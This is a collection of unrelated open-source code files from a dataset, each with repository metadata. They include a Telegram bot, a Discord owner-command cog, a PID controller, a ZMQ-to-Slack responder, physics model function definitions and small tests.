verbose_name="Is",
),
),
("example", models.CharField(blank=True, default="", max_length=200)),
(
"transaction_import",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="columns",
to="hordak.TransactionImport",
),
),
],
options={"ordering": ["transaction_import", "column_number"]},
),
migrations.AlterUniqueTogether(
name="transactionimportcolumn",
unique_together=set(
[("transaction_import", "column_number"), ("transaction_import", "to_field")]
),
),
]
| 1.734375 | 2 |
Bot Telegram.py | devilnotcry77/devil_not_cry | 0 | 3410 | from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for your bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(msg: types.Message):
    await msg.reply(f'Добро пожаловать, {msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
if msg.text.lower() == 'привет':
await msg.answer('Привет!')
else:
await msg.answer('Я не понимаю')
if __name__ == '__main__':
executor.start_polling(dp) | 2.5625 | 3 |
redactor/utils.py | danlgz/django-wysiwyg-redactor | 0 | 3411 | <reponame>danlgz/django-wysiwyg-redactor<filename>redactor/utils.py
from django.core.exceptions import ImproperlyConfigured
from importlib import import_module
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
from django.utils.functional import Promise
import json
def import_class(path):
path_bits = path.split('.')
if len(path_bits) < 2:
message = "'{0}' is not a complete Python path.".format(path)
raise ImproperlyConfigured(message)
class_name = path_bits.pop()
module_path = '.'.join(path_bits)
module_itself = import_module(module_path)
if not hasattr(module_itself, class_name):
message = "The Python module '{0}' has no '{1}' class.".format(
module_path,
class_name
)
raise ImportError(message)
return getattr(module_itself, class_name)
def is_module_image_installed():
try:
from PIL import Image
from PIL import ImageFile
except ImportError:
try:
import Image
import ImageFile
except ImportError:
return False
return True
class LazyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Promise):
return force_text(obj)
return super(LazyEncoder, self).default(obj)
def json_dumps(data):
return json.dumps(data, cls=LazyEncoder)
| 2.21875 | 2 |
timedpid.py | DrGFreeman/PyTools | 1 | 3412 | # timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
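

# Illustrative usage sketch (not part of the original library); the gains,
# set point and process variable below are arbitrary example values.
if __name__ == "__main__":
    pid = TimedPID(kp=2.0, ki=0.5, kd=0.1)
    pid.setCmdRange(-10., 10.)
    # Compute one command with an explicit 0.1 s time step;
    # getCmdAutoStep would instead derive the step from elapsed time.
    cmd = pid.getCmdStep(setPoint=100., procVar=90., timeStep=0.1)
    print("PID command:", cmd)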
| 2.078125 | 2 |
pmon/zmq_responder.py | bernd-clemenz/pmon | 1 | 3413 | #
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
:param message: the message record to be send to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
go_on = True if message['msg'] != 'stop' else False
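

# Hypothetical usage sketch: the class is a context manager, so binding and
# cleanup happen in the with-block. This assumes pmon.CFG and pmon.LOG have
# been initialised by the surrounding application before this point.
if __name__ == '__main__':
    with ZmqResponder() as responder:
        responder.respond()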
| 2.453125 | 2 |
test/test_substitute.py | sanskrit/padmini | 1 | 3414 | <filename>test/test_substitute.py
from padmini import operations as op
def test_yatha():
before = ("tAs", "Tas", "Ta", "mip")
after = ("tAm", "tam", "ta", "am")
for i, b in enumerate(before):
assert op.yatha(b, before, after) == after[i]
"""
def test_ti():
assert S.ti("ta", "e") == "te"
assert S.ti("AtAm", "e") == "Ate"
def test_antya():
assert S.antya("ti", "u") == "tu"
assert S.antya("te", "Am") == "tAm"
"""
| 3.0625 | 3 |
TVSaffiliations/extractemails_nogui.py | kmhambleton/LSST-TVSSC.github.io | 0 | 3415 | # coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
__author__ = '<NAME>, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
# get the script name without the extension & use it to build up
# the json filename
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| 3.0625 | 3 |
cogs/owner.py | Obsidian-Development/JDBot | 0 | 3416 | <reponame>Obsidian-Development/JDBot<filename>cogs/owner.py
from discord.ext import commands, menus
import utils
import random , discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy
import traceback, textwrap
from discord.ext.menus.views import ViewMenuPages
class Owner(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="a command to send mail")
async def mail(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.reply("User not found, returning Letter")
user = ctx.author
if user:
await ctx.reply("Please give me a message to use.")
message = await self.bot.wait_for("message",check = utils.check(ctx))
embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215))
embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url))
embed_message.set_footer(text = f"{ctx.author.id}")
embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png")
if (user.dm_channel is None):
await user.create_dm()
try:
await user.send(embed=embed_message)
except:
user = ctx.author
await user.send(content="Message failed. sending",embed=embed_message)
embed_message.add_field(name="Sent To:",value=str(user))
await self.bot.get_channel(855217084710912050).send(embed=embed_message)
@commands.command()
async def load(self, ctx, *, cog = None):
if cog:
try:
self.bot.load_extension(cog)
except Exception as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Loaded cog(see if there's any errors)")
if cog is None:
await ctx.send("you can't ask to load no cogs.")
@commands.command()
async def reload(self, ctx, *, cog = None):
cog = cog or "all"
if cog == "all":
for x in list(self.bot.extensions):
try:
self.bot.reload_extension(x)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("done reloading all cogs(check for any errors)")
else:
try:
self.bot.reload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog reloaded :D (check for any errors)")
@commands.command()
async def unload(self, ctx, *, cog = None):
if cog:
try:
self.bot.unload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog should be unloaded just fine :D.(check any errors)")
if cog is None:
await ctx.send("you can't ask to reload no cogs")
@commands.command()
async def shutdown(self, ctx):
await ctx.send("shutdown/logout time happening.")
await self.bot.close()
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
async def cog_command_error(self, ctx, error):
if ctx.command or not ctx.command.has_error_handler():
await ctx.send(error)
traceback.print_exc()
#I need to fix all cog_command_error
@commands.command(brief="Changes Bot Status(Owner Only)")
async def status(self , ctx , * , args=None):
if await self.bot.is_owner(ctx.author):
if args:
await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args))
if args is None:
await self.bot.change_presence(status=discord.Status.do_not_disturb)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("That's an owner only command")
@commands.command(brief="Only owner command to change bot's nickname")
async def change_nick(self, ctx ,*, name=None):
if await self.bot.is_owner(ctx.author):
if isinstance(ctx.channel, discord.TextChannel):
await ctx.send("Changing Nickname")
try:
await ctx.guild.me.edit(nick=name)
except discord.Forbidden:
await ctx.send("Appears not to have valid perms")
if isinstance(ctx.channel,discord.DMChannel):
await ctx.send("You can't use that in Dms.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that command")
class ServersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215))
return embed
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)")
async def servers(self, ctx):
if await self.bot.is_owner(ctx.author):
pag = commands.Paginator()
for g in self.bot.guilds:
pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
@commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook")
async def webhook_update(self, ctx, *, args = None):
if await self.bot.is_owner(ctx.author):
if args:
if isinstance(ctx.channel, discord.TextChannel):
try:
await ctx.message.delete()
except:
await ctx.send("It couldn't delete the message in this guils so, I kept it here.")
webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="<NAME>",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="<NAME>",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
if args is None:
await ctx.send("You sadly can't use it like that.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that")
@commands.command(brief="Commands to see what guilds a person is in.")
async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None):
user = user or ctx.author
pag = commands.Paginator()
for g in user.mutual_guilds:
pag.add_line(f"{g}")
pages = [page.strip("`") for page in pag.pages]
pages = pages or ["No shared servers"]
menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
@commands.command(brief="A command to add sus_users with a reason")
async def addsus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("can't have a user be none.")
if user:
await ctx.reply("Please give me a reason why:")
reason = await self.bot.wait_for("message",check= utils.check(ctx))
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("added sus users, succesfully")
@commands.command(brief="a command to remove sus users.")
async def removesus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a none user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("Removed sus users.")
class SusUsersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215))
embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False)
return embed
@commands.command(brief="a command to grab all in the sus_users list")
async def sus_users(self, ctx):
cur = await self.bot.sus_users.cursor()
cursor = await cur.execute("SELECT * FROM SUS_USERS;")
sus_users = tuple(await cursor.fetchall())
await cur.close()
await self.bot.sus_users.commit()
menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True)
await menu.start(ctx)
@sus_users.error
async def sus_users_error(self, ctx, error):
await ctx.send(error)
class TestersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215))
embed.add_field(name = "User ID:", value = f"{item}", inline = False)
return embed
@commands.command(brief = "a command listed all the commands")
async def testers(self, ctx):
menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True)
await menu.start(ctx)
@commands.command()
async def update_sus(self, ctx):
await self.bot.sus_users.commit()
await ctx.send("Updated SQL boss.")
@update_sus.error
async def update_sus_error(self, ctx, error):
await ctx.send(error)
@commands.command(aliases=["bypass_command"])
async def command_bypass(self, ctx ,user: utils.BetterUserconverter = None, *, command = None):
#make sure to swap to autoconverter if it gets added.
user = user or ctx.author
if command:
command_wanted=self.bot.get_command(command)
if command_wanted:
await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!")
self.bot.special_access[user.id]=command_wanted.name
if command_wanted is None:
await ctx.send("Please specify a valid command.")
if command is None:
await ctx.send("select a command :(")
@commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"])
async def resetcooldown(self, ctx, *, command = None):
if not command:
return await ctx.send("please specificy a command")
command_wanted = self.bot.get_command(command)
if not command_wanted:
return await ctx.send("please specify a command")
if not command_wanted.is_on_cooldown(ctx):
return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.")
command_wanted.reset_cooldown(ctx)
await ctx.send(f"reset cooldown of {command_wanted}")
@commands.command(brief = "leaves a guild only use when needed or really wanted. Otherwise no thanks.")
async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None):
guild = guild or ctx.guild
if guild is None: return await ctx.send("Guild is None can't do anything.")
await ctx.send("Bot leaving guild :(")
try:
await guild.leave()
except Exception as e:
await ctx.send(f"Somehow an error occured: {e}")
traceback.print_exc()
@commands.command()
async def aioinput_test(self, ctx, *, args = None):
args = args or "Test"
result=await self.bot.loop.run_in_executor(None, input, (f"{args}:"))
await ctx.send(f"Result of the input was {result}")
@commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.")
async def reload_basic(self, ctx, *, args = None):
if args is None:await ctx.send("Can't reload module named None")
if args:
try: module = importlib.import_module(name=args)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
try: value=importlib.reload(module)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}")
@commands.command(brief="backs up a channel and then sends it into a file or mystbin")
async def channel_backup(self, ctx):
messages = await ctx.channel.history(limit = None, oldest_first = True).flatten()
new_line = "\n"
page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages)
mystbin_client = mystbin.Client(session = self.bot.session)
paste = await mystbin_client.post(page)
await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}")
@channel_backup.error
async def channel_backup_error(self, ctx, error):
etype = type(error)
trace = error.__traceback__
values=''.join(map(str,traceback.format_exception(etype, error, trace)))
pages = textwrap.wrap(values, width = 1992)
menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
mystbin_client = mystbin.Client(session=self.bot.session)
paste = await mystbin_client.post(values)
await ctx.send(f"Traceback: {paste.url}")
@commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"])
async def addrtfm(self, ctx, name = None, *, url = None):
if not name or not url or not name and not url:
return await ctx.send("You need a name and also url.")
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"added {name} and {url} to the rtfm DB")
@commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"])
async def removertfm(self, ctx, *, name = None):
if name is None:
return await ctx.send("You can't remove None")
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"Removed the rfm value {name}.")
@commands.command(brief = "a command to save images to imgur(for owner only lol)")
async def save_image(self, ctx):
if not ctx.message.attachments:
return await ctx.send("You need to provide some attachments.")
await ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?")
for x in ctx.message.attachments:
try:
discord.utils._get_mime_type_for_image(await x.read())
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"])
imgur_url = await imgur_client.upload(await x.read())
await ctx.send(f"{imgur_url['link']}")
@commands.command(brief="A command to remove testers")
async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
return await ctx.send(f"{user} isn't in the testers list.")
else:
self.bot.testers.remove(user.id)
await ctx.send(f"Removed tester known as {user}")
@commands.command(brief="A command to add testers")
async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
self.bot.testers.append(user.id)
await ctx.send(f"added tester known as {user}")
else:
return await ctx.send(f"{user} is in the testers list already!")
def tweepy_post(self, post_text = None):
consumer_key = os.getenv('tweet_key')
consumer_secret = os.getenv('tweet_secret')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
access_token = os.getenv('tweet_access')
access_secret = os.getenv('tweet_token')
auth.set_access_token(access_token, access_secret)
twitter_api = tweepy.API(auth)
return twitter_api.update_status(status = post_text)
@commands.command(brief = "sends tweet to JDBot Twitter")
async def send_tweet(self, ctx, *, args = None):
if not args:
return await ctx.send("you can't send nothing to twitter.")
try:
tweet_time = functools.partial(self.tweepy_post, args)
post = await self.bot.loop.run_in_executor(None, tweet_time)
except Exception as e:
traceback.print_exc()
return await ctx.send(f"Exception occured at {e}")
await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}")
@commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)")
async def chunk_guild(self, ctx):
if ctx.guild is None:
return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.")
if ctx.guild.chunked:
return await ctx.send("No need to chunk this guild, it appears to be chunked")
await ctx.guild.chunk(cache = True)
await ctx.send("Finished chunking..")
@chunk_guild.error
async def chunk_guild_error(self, ctx, error):
await ctx.send(error)
traceback.print_exc()
@commands.command(brief = "displays the guild status and user status immediately")
async def stats_status(self, ctx):
await ctx.send("changing status, check now....")
await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users"))
@stats_status.error
async def stats_status_error(self, ctx, error):
await ctx.send(error)
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.")
async def servers2(self, ctx):
if await self.bot.is_owner(ctx.author):
sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at)
pag = commands.Paginator()
for g in sorted_guilds:
pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
def setup(bot):
bot.add_cog(Owner(bot))
| 2.234375 | 2 |
tests/input_files/full_sm_UFO/function_library.py | valassi/mg5amc_test | 1 | 3417 | <gh_stars>1-10
# This file is part of the UFO.
#
# This file contains definitions for functions that
# are extensions of the cmath library, and correspond
# either to functions that are in cmath, but inconvenient
# to access from there (e.g. z.conjugate()),
# or functions that are simply not defined.
#
#
from __future__ import absolute_import
__date__ = "22 July 2010"
__author__ = "<EMAIL>"
import cmath
from .object_library import all_functions, Function
#
# shortcuts for functions from cmath
#
complexconjugate = Function(name = 'complexconjugate',
arguments = ('z',),
expression = 'z.conjugate()')
re = Function(name = 're',
arguments = ('z',),
expression = 'z.real')
im = Function(name = 'im',
arguments = ('z',),
expression = 'z.imag')
# New functions (trigonometric)
sec = Function(name = 'sec',
arguments = ('z',),
expression = '1./cmath.cos(z)')
asec = Function(name = 'asec',
arguments = ('z',),
expression = 'cmath.acos(1./z)')
csc = Function(name = 'csc',
arguments = ('z',),
expression = '1./cmath.sin(z)')
acsc = Function(name = 'acsc',
arguments = ('z',),
expression = 'cmath.asin(1./z)')
| 2.21875 | 2 |
cli/polyaxon/managers/cli.py | hackerwins/polyaxon | 0 | 3418 | <gh_stars>0
#!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .polyaxoncli file."""
IS_GLOBAL = True
CONFIG_FILE_NAME = ".polyaxoncli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
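

# Minimal usage sketch (assumes the global config directory is writable;
# the version string is an arbitrary example value, not a real release).
if __name__ == "__main__":
    CliConfigManager.reset(current_version="1.0.0")
    if CliConfigManager.should_check():
        print("compatibility check is due; query the API for server versions")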
| 1.742188 | 2 |
duckql/properties/tests/test_null.py | fossabot/duckql-python | 4 | 3419 | import pytest
from duckql.properties import Null
@pytest.fixture(scope="module")
def valid_instance() -> Null:
return Null()
def test_string(valid_instance: Null):
assert str(valid_instance) == 'NULL'
def test_obj(valid_instance: Null):
assert valid_instance.obj == 'properties.Null'
def test_json_parse(valid_instance: Null):
assert valid_instance.json() == '{"obj": "properties.Null"}'
| 2.484375 | 2 |
